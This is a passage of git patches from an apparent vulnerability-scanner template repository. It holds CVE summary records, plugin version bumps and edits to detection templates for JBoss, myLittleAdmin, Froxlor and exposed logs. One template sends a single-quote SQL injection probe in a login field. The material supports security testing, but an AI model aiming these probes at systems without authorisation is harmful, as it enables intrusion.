Access Control that allows attackers to obtain sensitive data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38817.yaml"} +{"ID":"CVE-2022-38870","Info":{"Name":"Free5gc - Information disclosure","Severity":"high","Description":"Free5gc v3.2.1 is vulnerable to Information disclosure.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-38870.yaml"} +{"ID":"CVE-2022-39960","Info":{"Name":"Atlassian Jira addon Netic Group Export \u003c 1.0.3 - Unauthenticated Access","Severity":"medium","Description":"The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-39960.yaml"} +{"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"cves/2022/CVE-2022-40083.yaml"} +{"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40359.yaml"} +{"ID":"CVE-2022-4050","Info":{"Name":"JoomSport \u003c 5.2.8 - Unauthenticated SQLi","Severity":"critical","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-4050.yaml"} +{"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40684.yaml"} +{"ID":"CVE-2022-40734","Info":{"Name":"UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal","Severity":"medium","Description":"UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2022/CVE-2022-40734.yaml"} +{"ID":"CVE-2022-40879","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-40879.yaml"} +{"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-40881.yaml"} +{"ID":"CVE-2022-41473","Info":{"Name":"RPCMS 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-41473.yaml"} +{"ID":"CVE-2022-41840","Info":{"Name":"Welcart eCommerce \u003c= 2.7.7 - Unauth Directory Traversal","Severity":"critical","Description":"Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin \u003c= 2.7.7 on WordPress.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-41840.yaml"} +{"ID":"CVE-2022-42233","Info":{"Name":"Tenda 11N - Authentication Bypass","Severity":"critical","Description":"Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-42233.yaml"} +{"ID":"CVE-2022-4260","Info":{"Name":"WP-Ban \u003c 1.69.1 - Admin Stored XSS","Severity":"high","Description":"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-4260.yaml"} +{"ID":"CVE-2022-42746","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42746.yaml"} +{"ID":"CVE-2022-42747","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42747.yaml"} +{"ID":"CVE-2022-42748","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42748.yaml"} +{"ID":"CVE-2022-42749","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-42749.yaml"} +{"ID":"CVE-2022-43014","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43014.yaml"} +{"ID":"CVE-2022-43015","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43015.yaml"} +{"ID":"CVE-2022-43016","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43016.yaml"} +{"ID":"CVE-2022-43017","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43017.yaml"} +{"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-43018.yaml"} +{"ID":"CVE-2022-45362","Info":{"Name":"Paytm Payment Gateway Plugin \u003c= 2.7.0 Server Side Request Forgery (SSRF)","Severity":"high","Description":"Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2022/CVE-2022-45362.yaml"} +{"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning platform \u003c= 7.15 - Open Redirect","Severity":"medium","Description":"ILIAS before 7.16 has an Open Redirect\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-45917.yaml"} +{"ID":"CVE-2022-45933","Info":{"Name":"KubeView - Information disclosure","Severity":"critical","Description":"KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a \"fun side project and a learning exercise,\" and not \"very secure.\"\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-45933.yaml"} +{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c= 1.2.22 Unauthenticated Command Injection","Severity":"critical","Description":"The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-46169.yaml"} +{"ID":"CVE-2022-46381","Info":{"Name":"Certain Linear eMerge E3-Series - Cross Site Scripting","Severity":"medium","Description":"Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-46381.yaml"} From cf2d11a62739daec661cc1dbfbfc3935ed2bfe43 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 18 Jan 2023 04:02:19 +0000 Subject: [PATCH 0993/1133] Auto WordPress Plugins Update [Wed Jan 18 04:02:19 UTC 2023] :robot: --- helpers/wordpress/plugins/all-in-one-wp-migration.txt | 2 +- helpers/wordpress/plugins/custom-css-js.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/elementskit-lite.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/leadin.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index 2d02cbd2f2..d7ebe3be20 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.69 \ No newline at end of file +7.70 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-css-js.txt b/helpers/wordpress/plugins/custom-css-js.txt index f2fe478687..e81329a826 100644 --- a/helpers/wordpress/plugins/custom-css-js.txt +++ b/helpers/wordpress/plugins/custom-css-js.txt @@ -1 +1 @@ -3.41 \ No newline at end of file +3.42 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index e06d07afe1..a8819280cf 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.10.0 \ No newline at end of file +3.10.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index 6533b66871..96d771776b 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -2.8.0 \ No newline at end of file +2.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 0501b79e98..51bd85577a 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.3.6 \ No newline at end of file +2.3.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 36c41896d6..20fc9e6400 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -10.0.10 \ No newline at end of file +10.0.16 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 64b5ae3938..ae153944ee 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.4.0 \ No newline at end of file +4.5.0 \ No newline at end of file From 56778633b1f312c6dc6bb009c974d2deb587e52b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 11:44:54 +0530 Subject: [PATCH 0994/1133] added-host-redirect --- exposed-panels/mylittleadmin-panel.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/exposed-panels/mylittleadmin-panel.yaml b/exposed-panels/mylittleadmin-panel.yaml index 6b7e76479c..a872dc72b5 100644 --- a/exposed-panels/mylittleadmin-panel.yaml +++ b/exposed-panels/mylittleadmin-panel.yaml @@ -1,4 +1,4 @@ -id: myLittleAdmin-panel +id: mylittleadmin-panel info: name: myLittleAdmin Panel @@ -11,17 +11,20 @@ info: metadata: verified: true shodan-query: http.html:"myLittleAdmin" - tags: panel,myLittleAdmin + tags: panel,mylittleadmin,login requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/mylittleadmin/" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - "status_code == 200" - - "contains(body, 'myLittleAdmin for SQL Server')" - condition: and \ No newline at end of file + - "contains(body, 'myLittleAdmin for SQL Server')" + condition: and From 75be3abd0326dcc660fdecdc6aea4e9384de640a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 06:28:46 +0000 Subject: [PATCH 0995/1133] Auto Generated New Template Addition List [Wed Jan 18 06:28:46 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 42633aa2ca..1a50233555 100644 --- a/.new-additions +++ b/.new-additions @@ -1,9 +1,11 @@ +.github/scripts/yaml2json.go cves/2017/CVE-2017-11165.yaml cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-0234.yaml cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml +cves/2022/CVE-2022-36537.yaml cves/2022/CVE-2022-44877.yaml default-logins/empire/empirec2-default-login.yaml exposed-panels/episerver-panel.yaml From 7ee7fc813de69df58e6b17707bcf8147118c77f2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 06:44:52 +0000 Subject: [PATCH 0996/1133] Auto Generated CVE annotations [Wed Jan 18 06:44:52 UTC 2023] :robot: --- cves/2017/CVE-2017-11165.yaml | 2 +- cves/2022/CVE-2022-36537.yaml | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-11165.yaml b/cves/2017/CVE-2017-11165.yaml index d9808cb0e6..02a472e7be 100644 --- a/cves/2017/CVE-2017-11165.yaml +++ b/cves/2017/CVE-2017-11165.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.title:"datataker" verified: "true" - tags: exposure,lfr,edb,cve,cve2017,datataker,config + tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure requests: - method: GET diff --git a/cves/2022/CVE-2022-36537.yaml b/cves/2022/CVE-2022-36537.yaml index 4989548c32..9049086f9b 100644 --- a/cves/2022/CVE-2022-36537.yaml +++ b/cves/2022/CVE-2022-36537.yaml @@ -9,14 +9,15 @@ info: reference: - https://github.com/Malwareman007/CVE-2022-36537/ - https://nvd.nist.gov/vuln/detail/CVE-2022-36537 + - https://tracker.zkoss.org/browse/ZK-5150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 metadata: - verified: "true" shodan-query: http.title:"Server backup manager" + verified: "true" tags: cve,cve2022,zk-framework,exposure,unauth requests: From 607795fcb754f6dbd9fc395827471a7b314c3973 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 12:25:26 +0530 Subject: [PATCH 0997/1133] Update and rename cves/2008/CVE-2008-3273.yaml to cves/2010/CVE-2010-1429.yaml --- cves/2008/CVE-2008-3273.yaml | 26 -------------------------- cves/2010/CVE-2010-1429.yaml | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 35 insertions(+), 26 deletions(-) delete mode 100644 cves/2008/CVE-2008-3273.yaml create mode 100644 cves/2010/CVE-2010-1429.yaml diff --git a/cves/2008/CVE-2008-3273.yaml b/cves/2008/CVE-2008-3273.yaml deleted file mode 100644 index 427cb2a215..0000000000 --- a/cves/2008/CVE-2008-3273.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2008-3273_JBoss_EAP_Sensitive_Information_Leakage_Server_Status - -info: - name: CVE-2008-3273 JBoss EAP Sensitive Information Leakage Server Status - description: CVE-2008-3273, CVE-2010-1429 - author: R12W4N - severity: low - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 - tags: jboss,eap,tomcat - -requests: - - method: GET - path: - - "{{BaseURL}}/status?full=true" - matchers-condition: and - matchers: - - type: word - words: - - "JVM" - - "memory" - condition: and - - - type: status - status: - - 200 diff --git a/cves/2010/CVE-2010-1429.yaml b/cves/2010/CVE-2010-1429.yaml new file mode 100644 index 0000000000..74110f4a31 --- /dev/null +++ b/cves/2010/CVE-2010-1429.yaml @@ -0,0 +1,35 @@ +id: CVE-2010-1429 + +info: + name: JBossEAP - Sensitive Information Disclosure + author: R12W4N + severity: low + description: | + Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 + - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + classification: + cve-id: CVE-2010-1429 + metadata: + verified: true + shodan-query: title:"JBoss" + tags: cve,cve2010,jboss,eap,tomcat,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/status?full=true" + + matchers-condition: and + matchers: + - type: word + words: + - "JVM" + - "memory" + - "localhost/" + condition: and + + - type: status + status: + - 200 From f929178c1485a46cc78c436ca9c895bc45692570 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 12:28:00 +0530 Subject: [PATCH 0998/1133] lint fix --- cves/2010/CVE-2010-1429.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1429.yaml b/cves/2010/CVE-2010-1429.yaml index 74110f4a31..fce786f3e1 100644 --- a/cves/2010/CVE-2010-1429.yaml +++ b/cves/2010/CVE-2010-1429.yaml @@ -27,7 +27,7 @@ requests: words: - "JVM" - "memory" - - "localhost/" + - "localhost/" condition: and - type: status From 7b4ad916a9ffa598784d23895c1e8596b6be6c2d Mon Sep 17 00:00:00 2001 From: meme-lord <meme-lord@users.noreply.github.com> Date: Wed, 18 Jan 2023 07:00:30 +0000 Subject: [PATCH 0999/1133] fixed text error (#6557) --- cves/2021/CVE-2021-42258.yaml | 2 +- exposed-panels/axigen-webadmin.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 2816a1013b..d2c44c406a 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -29,7 +29,7 @@ requests: Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â{{VSÂ}}")}}&__VIEWSTATEGENERATOR={{url_encode("Â{{VSGÂ}}")}}&__EVENTVALIDATION={{url_encode("Â{{EVÂ}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 cookie-reuse: true extractors: diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml index 515f319cbe..8e4a17f0d4 100644 --- a/exposed-panels/axigen-webadmin.yaml +++ b/exposed-panels/axigen-webadmin.yaml @@ -10,7 +10,7 @@ info: classification: cwe-id: CWE-200 metadata: - shodan-query: http.title:"Axigen WebAdmin" + shodan-query: http.title:"Axigen WebAdmin" tags: axigen,panel requests: @@ -22,7 +22,7 @@ requests: matchers: - type: word words: - - '<title>Axigen WebAdmin' + - 'Axigen WebAdmin' - type: status status: From a665ebb6e504e35ff4df12b4b92f732ee18711e5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 18 Jan 2023 07:09:01 +0000 Subject: [PATCH 1001/1133] Auto Generated New Template Addition List [Wed Jan 18 07:09:01 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1a50233555..6e2295c824 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ .github/scripts/yaml2json.go +cves/2010/CVE-2010-1429.yaml cves/2017/CVE-2017-11165.yaml cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml From 126c4967624c427fc0e7d4c991f11eddf50ad8f5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 12:40:41 +0530 Subject: [PATCH 1002/1133] reverted-with- --- exposed-panels/mylittleadmin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/mylittleadmin-panel.yaml b/exposed-panels/mylittleadmin-panel.yaml index a872dc72b5..b5e64f4c98 100644 --- a/exposed-panels/mylittleadmin-panel.yaml +++ b/exposed-panels/mylittleadmin-panel.yaml @@ -26,5 +26,5 @@ requests: - type: dsl dsl: - "status_code == 200" - - "contains(body, 'myLittleAdmin for SQL Server')" + - "contains(body, '<title>myLittleAdmin for SQL Server')" condition: and From c10f665af57de5962eba4cfee78dc6200f1a6215 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 12:48:27 +0530 Subject: [PATCH 1003/1133] updated id, name, path and description --- .../froxlor-xss.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/froxlor-reflected-xss.yaml => vulnerabilities/froxlor-xss.yaml (78%) diff --git a/misconfiguration/froxlor-reflected-xss.yaml b/vulnerabilities/froxlor-xss.yaml similarity index 78% rename from misconfiguration/froxlor-reflected-xss.yaml rename to vulnerabilities/froxlor-xss.yaml index 865196cf5f..8eb569998b 100644 --- a/misconfiguration/froxlor-reflected-xss.yaml +++ b/vulnerabilities/froxlor-xss.yaml @@ -1,9 +1,11 @@ -id: froxlor-reflected-xss +id: froxlor-xss info: - name: Froxlor - Cross Site Scripting + name: Froxlor Server Management - Cross Site Scripting author: tess severity: medium + description: | + The user must click the forgot password link in order to execute this XSS. metadata: verified: true shodan-dork: title:"Froxlor Server Management Panel" From 1045c516da450aebb98e900dbcc9560aa180e3ea Mon Sep 17 00:00:00 2001 From: "Douglas S. Santos" <douglas.secco@gmail.com> Date: Wed, 18 Jan 2023 04:23:05 -0300 Subject: [PATCH 1004/1133] content-type also can be set as application/octet-stream + new word (#6545) --- exposures/logs/error-logs.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index b3eb38dbd0..73ec734e2a 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -51,11 +51,14 @@ requests: - "Array" - "Exception" - "Fatal" + - "FastCGI sent in stderr" condition: or - type: word + condition: or words: - text/plain + - application/octet-stream part: header - type: status From cd87151ff80c1fba9aa1e4334109793450c59d14 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 07:23:13 +0000 Subject: [PATCH 1005/1133] Auto Generated New Template Addition List [Wed Jan 18 07:23:12 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6e2295c824..225cf58a0d 100644 --- a/.new-additions +++ b/.new-additions @@ -47,3 +47,4 @@ technologies/wordpress/plugins/webp-express.yaml technologies/xerox-workcentre-detect.yaml token-spray/api-ipdata.yaml token-spray/api-ipinfo.yaml +vulnerabilities/froxlor-xss.yaml From a1268511320b58930ea1add2f90c87fb12ccb00f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 07:24:57 +0000 Subject: [PATCH 1007/1133] Auto Generated CVE annotations [Wed Jan 18 07:24:57 UTC 2023] :robot: --- cves/2010/CVE-2010-1429.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1429.yaml b/cves/2010/CVE-2010-1429.yaml index fce786f3e1..45461e4e2f 100644 --- a/cves/2010/CVE-2010-1429.yaml +++ b/cves/2010/CVE-2010-1429.yaml @@ -9,11 +9,13 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - https://rhn.redhat.com/errata/RHSA-2010-0377.html + - http://securitytracker.com/id?1023918 classification: cve-id: CVE-2010-1429 metadata: - verified: true shodan-query: title:"JBoss" + verified: "true" tags: cve,cve2010,jboss,eap,tomcat,exposure requests: From b264e56fbd540883bbcdfdfe0bc563150cf9940d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 13:38:04 +0530 Subject: [PATCH 1008/1133] update severity --- exposures/backups/froxlor-database-backup.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/backups/froxlor-database-backup.yaml b/exposures/backups/froxlor-database-backup.yaml index 103f74e0cb..61064f46a1 100644 --- a/exposures/backups/froxlor-database-backup.yaml +++ b/exposures/backups/froxlor-database-backup.yaml @@ -3,7 +3,7 @@ id: froxlor-database-backup info: name: Froxlor Database Backup File Disclosure author: tess - severity: low + severity: medium metadata: verified: true shodan-dork: title:"Froxlor Server Management Panel" From 4828b2a2427377d4a624d1facacb39f77a1d95a0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 08:15:40 +0000 Subject: [PATCH 1010/1133] Auto Generated New Template Addition List [Wed Jan 18 08:15:39 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 225cf58a0d..8a8bf189fe 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/freepbx-administration-panel.yaml exposed-panels/ldap-account-manager-panel.yaml exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml +exposed-panels/mylittleadmin-panel.yaml exposed-panels/saltgui-panel.yaml exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml From 464a2db818ccf43f00d2e50d20ade55af01d1331 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 18 Jan 2023 08:19:41 +0000 Subject: [PATCH 1011/1133] Auto Generated New Template Addition List [Wed Jan 18 08:19:41 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 